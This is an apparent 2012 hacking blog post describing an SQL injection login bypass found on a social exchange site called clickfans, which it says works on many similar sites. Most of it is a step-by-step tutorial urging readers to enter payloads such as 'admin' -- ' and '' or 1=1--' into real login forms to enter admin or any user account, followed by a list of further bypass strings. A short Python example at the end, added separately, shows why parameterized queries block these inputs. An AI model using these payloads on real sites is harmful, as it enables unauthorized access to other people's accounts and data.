Sunday 5 August 2012

Social Sites Vulnerable To Admin ByPass

I was just browsing through the web and accidentally found a site called clickfans. I found an error like "Uninitialized string offset:". I was just seeking out what it was. I tried SQL injection on the site and it failed, then I tried admin bypass with unaccepted characters and it was a success, and I was able to log in to the admin page. But the interesting thing was that most of the other Social Exchange sites were also vulnerable, as they were made up of the same script.



Let's Begin Hacking:

Just Find A Social Exchange Site

Find Its Login Page

In the Username and Password fields, enter:
‘=’ ‘or’
Note: It's better to copy the above query (‘=’ ‘or’) from here, as it contains spaces.




The above query sets a true condition in SQL.
Now if the site is vulnerable, you will be logged in as the first user in the database. Generally the first user will be the admin.

Then I thought about how to log in as a specific user in the database:

Then I used the SQL ignore query (--).
What this query does is ignore everything after the (--), setting the condition to true. Let us look at the example below.
I used the query below as the login name and left the password blank:
admin' -- 

Note: It's better to copy the above query (admin' -- ) from here, as it contains spaces.



So when the query passes, admin is taken as the username and the password field is ignored, setting the condition to true, so that you can log in to the system with username admin without a password.
Note: You can replace admin with any username that is in the database of that particular website.
You can try different methods for extracting usernames, like SQL injection.
Other Bypass Queries
  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
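
Why these inputs work and what closes the hole, as an added example that is not part of the original post or the affected script: the same login query built by string concatenation and with bound parameters. The table layout, function names, sample accounts and the use of SQLite in place of the site's database are assumptions for illustration.

```python
import sqlite3

# Two of the login-name inputs listed on this page, each with a blank password.
PAGE_INPUTS = [("admin' -- ", ""), ("' or 1=1--", "")]

def make_db():
    """Constructed sample data; SQLite stands in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    # Plaintext column only to isolate the query-building flaw; store salted hashes in practice.
    db.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                   [("admin", "constructed-admin-pw"), ("alice", "constructed-alice-pw")])
    return db

def login_concatenated(db, name, password):
    """Assumed vulnerable pattern: user input is pasted into the SQL text."""
    sql = ("SELECT name FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(db, name, password):
    """Same query with bound parameters: input is treated as data, never as SQL."""
    row = db.execute("SELECT name FROM users WHERE name = ? AND password = ?",
                     (name, password)).fetchone()
    return row[0] if row else None

def compare(db):
    """For each page input: (input, result when concatenated, result when bound)."""
    return [(n, login_concatenated(db, n, p), login_parameterized(db, n, p))
            for n, p in PAGE_INPUTS]

if __name__ == "__main__":
    for name, weak, fixed in compare(make_db()):
        print(f"{name!r}: concatenated -> {weak!r}, parameterized -> {fixed!r}")
```

With bound parameters the quote and comment characters are compared literally against the name column, so no row matches and the login is refused.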
